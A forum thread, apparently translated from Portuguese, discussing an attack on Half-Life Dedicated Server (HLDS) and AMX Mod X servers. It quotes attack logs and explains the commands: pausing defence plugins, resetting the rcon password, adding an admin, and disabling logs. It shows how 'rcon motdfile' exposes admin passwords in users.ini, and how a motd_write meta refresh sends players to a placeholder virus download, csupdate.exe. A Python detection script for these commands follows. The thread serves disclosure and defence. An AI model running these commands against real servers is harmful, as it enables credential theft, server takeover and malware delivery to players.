Security flaw in HLDS

HLDS has a flaw that lets someone see the passwords of all the admins and modify files


Attack logs:

amxx pause rcon_defencer.amxx
amxx pause watfstarter.amxx
amxx pause rcon
amxx pause rcon.amxx
amxx pause krond-functions.amxx
amxx pause forceds_cs_functions_lite_2.1
amxx pause krond
amxx pause krond.amxx
amxx pause function
rcon_password 198709871234l0l
rcon hostname -redacted-
hostname -redacted-
motdfile motd.txt
motd_write <meta http-equiv="Refresh" content="0; url="URl do vírus ou site dele">
amx_addadmin "STEAM_0:0:718437961" "abcdefghijklmnopqrstu"
log off
mp_logfile 0




amxx pause rcon_defencer.amxx
amxx pause watfstarter.amxx
amxx pause rcon.amxx
amxx pause krond-functions.amxx
amxx pause forceds_cs_functions_lite_2.1
mapchangecfgfile maps.cfg
rcon_password x
hostname "Hacked by http://URL DO SITE DELE"
motdfile motd.txt
amx_cvar "rcon_password" "x"
motd_write <meta http-equiv="Refresh" content="0; url=URl do vírus ou site dele">
amx_addadmin "STEAM_0:0:718437961" "abcdefghijklmnopqrstu"
log off
mp_logfile 0


amxx pause rcon_defencer.amxx
amxx pause watfstarter.amxx
amxx pause rcon.amxx
amxx pause krond-functions.amxx
amxx pause forceds_cs_functions_lite_2.1
mapchangecfgfile maps.cfg
rcon_password x
motdfile motd.txt
amx_cvar "rcon_password" "x"
motd_write <meta http-equiv="Refresh" content="0; url=http://IPdoVIRUS/csupdate.exe">
log off
mp_logfile 0



amxx pause rcon_defencer.amxx
amxx pause watfstarter.amxx
amxx pause rcon
amxx pause rcon.amxx
amxx pause krond-functions.amxx
amxx pause forceds_cs_functions_lite_2.1
amxx pause krond
amxx pause krond.amxx
amxx pause function
rcon_password spankylovesyou
rcon hostname URL DO SITE DELE
hostname URL DO SITE DELE
motdfile motd.txt
motd_write <meta http-equiv="Refresh" content="0; url=http://URL DO SITE VIRUS">




COM_WriteFile: addons/metamod/exec.cfg

Ignoring non-customization file upload of addons\metamod\exec.cfg

COM_WriteFile: addons/amxmodx/configs/maps/31hp_knife_pro.cfg

Ignoring non-customization file upload of addons\amxmodx\configs\maps\31hp_knife_pro.cfg

COM_WriteFile: addons/amxmodx/configs/maps/35hp.cfg

Ignoring non-customization file upload of addons\amxmodx\configs\maps\35hp.cfg

COM_WriteFile: addons/amxmodx/configs/maps/35hp_alone.cfg

Ignoring non-customization file upload of addons\amxmodx\configs\maps\35hp_alone.cfg

COM_WriteFile: addons/amxmodx/configs/maps/hnsm_nemesis.cfg

Ignoring non-customization file upload of addons\amxmodx\configs\maps\hnsm_nemesis.cfg

COM_WriteFile: addons/amxmodx/configs/maps/as_oilrig.cfg

Ignoring non-customization file upload of addons\amxmodx\configs\maps\as_oilrig.cfg

Can't download addons\amxmodx\configs\maps\awp_bycastor32.cfg, already exists

Ignoring non-customization file upload of addons\amxmodx\configs\maps\awp_bycastor32.cfg

COM_WriteFile: addons/amxmodx/configs/maps/awp_india.cfg

Ignoring non-customization file upload of addons\amxmodx\configs\maps\awp_india.cfg

COM_WriteFile: addons/amxmodx/configs/maps/awp_mie.cfg

Ignoring non-customization file upload of addons\amxmodx\configs\maps\awp_mie.cfg

COM_WriteFile: addons/amxmodx/configs/maps/c21_kitty_b1.cfg

Ignoring non-customization file upload of addons\amxmodx\configs\maps\c21_kitty_b1.cfg

COM_WriteFile: addons/amxmodx/configs/maps/awp_rooft0ps_remake.cfg

Ignoring non-customization file upload of addons\amxmodx\configs\maps\awp_rooft0ps_remake.cfg

COM_WriteFile: addons/amxmodx/configs/maps/awp_rooftops.cfg

Ignoring non-customization file upload of addons\amxmodx\configs\maps\awp_rooftops.cfg
 
The attacker first pauses the defense plugins and then uses this:

He uses the command:



amx_rcon rcon_password senha

or


amx_cvar rcon_password senha


Then he uses:


rcon_password "senha que ele colocou no server"


To get the passwords of all the admins he uses:



rcon motdfile addons/amxmodx/configs/users.ini
reconnect




To put his site or the URL of a virus into motd.txt, he uses:


motd_write <META HTTP-EQUIV=Refresh CONTENT="0 URL=http://IP DO VIRUS/csupdate.exe">



To view the settings in the server.cfg file he uses:


rcon motdfile server.cfg 
reconnect
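
A detection sketch for the command chain quoted in this post, added here as an example and not part of the original thread or of HLDS/AMX Mod X. The rule names, the `scan` and `verdict` helpers and the escalation threshold are assumptions; the sample lines are constructed with placeholder values.

```python
import re

# Each rule mirrors one step of the command sequence quoted in the post above.
# The rcon_password rule deliberately captures nothing, so no credential is copied.
RULES = [
    ("plugin_paused", re.compile(r"^amxx\s+pause\s+(\S+)", re.I)),
    ("rcon_password_set", re.compile(r'^(?:amx_(?:rcon|cvar)\s+)?"?rcon_password"?\s+\S', re.I)),
    ("motdfile_redirect", re.compile(r"^motdfile\s+(\S+)", re.I)),
    ("motd_meta_refresh", re.compile(r'^motd_write\b.*http-equiv\s*=\s*"?refresh', re.I)),
    ("admin_added", re.compile(r'^amx_addadmin\s+"?([^"\s]+)', re.I)),
    ("logging_disabled", re.compile(r"^(?:log\s+off|mp_logfile\s+0)\b", re.I)),
]

def scan(lines):
    """Return (line_number, rule, detail) for every suspicious console line."""
    findings = []
    for number, raw in enumerate(lines, start=1):
        # Drop a leading "rcon " so remote and local forms hit the same rule.
        line = re.sub(r"^rcon\s+", "", raw.strip(), flags=re.I)
        for rule, pattern in RULES:
            match = pattern.search(line)
            if match:
                detail = match.group(1) if match.groups() else ""
                # motdfile motd.txt is routine; other targets expose that file.
                if (rule, detail.lower()) != ("motdfile_redirect", "motd.txt"):
                    findings.append((number, rule, detail))
                break
    return findings

def verdict(findings):
    """Escalate when logging was disabled alongside other steps of the chain."""
    seen = {rule for _, rule, _ in findings}
    if "logging_disabled" in seen and len(seen) >= 3:
        return "likely-compromise"
    return "review" if seen else "clean"

# Constructed sample modelled on the quoted logs; all values are placeholders.
SAMPLE = [
    "amxx pause rcon_defencer.amxx",
    'amx_cvar "rcon_password" "EXAMPLE"',
    "motdfile motd.txt",
    'motd_write <meta http-equiv="Refresh" content="0; url=http://example.invalid/">',
    "rcon motdfile addons/amxmodx/configs/users.ini",
    "log off",
    "mp_logfile 0",
]

if __name__ == "__main__":
    print(scan(SAMPLE), verdict(scan(SAMPLE)))
```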
 
Wow!!!! Anderson, here every time I join the server I get this:
[image: vírus.jpg]


The same csupdate.exe that you mentioned in the log. Good thing the antivirus blocks it.

Whether on Steam or non-Steam, it asks to download the virus!!!!
 
I fixed the bug
 
Ugh, the competition between servers is getting ugly, huh.